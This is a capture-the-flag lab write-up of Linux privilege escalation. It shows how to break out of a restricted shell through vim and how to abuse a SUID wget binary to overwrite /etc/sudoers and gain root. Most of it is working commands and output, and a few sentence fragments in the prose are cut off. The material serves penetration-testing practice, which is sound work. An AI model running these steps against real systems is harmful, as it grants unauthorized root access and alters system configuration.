Restricted Shell linux -privilege-escalation | https://attackdefense.com Level: Hard

The Challenge
It is very common
Your mission is to get a root shell on the box!
Challenge Accepted
To be
The Solution
I went straight for one of the first things I try, vim escape. Just type vim, then hit esc button then type the following…
:set shell=/bin/bash
:shell
Easy, now we are free. Time to see what is next, again turn to next thing I try, find SETUID files.
student@attackdefense:/usr/bin$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/wget
/usr/bin/sudo
/bin/mount
/bin/umount
/bin/su
One should stand out right away,
student@attackdefense:/$ echo "student ALL=(ALL) NOPASSWD: ALL" > /tmp/sudoers
student@attackdefense:/$ python -m SimpleHTTPServer 8080 &
student@attackdefense:/$ # We use & to background http server so we can wget in same terminal
student@attackdefense:/tmp$ wget 0.0.0.0:8080/tmp/sudoers -O /etc/sudoers
--2019-03-26 01:23:32-- https://0.0.0.0:8080/tmp/sudoers
Connecting to 0.0.0.0:8080... connected.
HTTP request sent, awaiting response... 127.0.0.1 - - [26/Mar/2019 01:23:32] "GET /tmp/sudoers HTTP/1.1" 200 -
200 OK
Length: 33 [application/octet-stream]
Saving to: '/etc/sudoers'
/etc/sudoers 100%[=================================================================================================>] 33 --.-KB/s in 0s
2019-03-26 01:23:32 (9.81 MB/s) - '/etc/sudoers' saved [33/33]
Now for the final act…
student@attackdefense:/tmp$ sudo /bin/bash
root@attackdefense:/tmp# id
uid=0(root) gid=0(root) groups=0(root)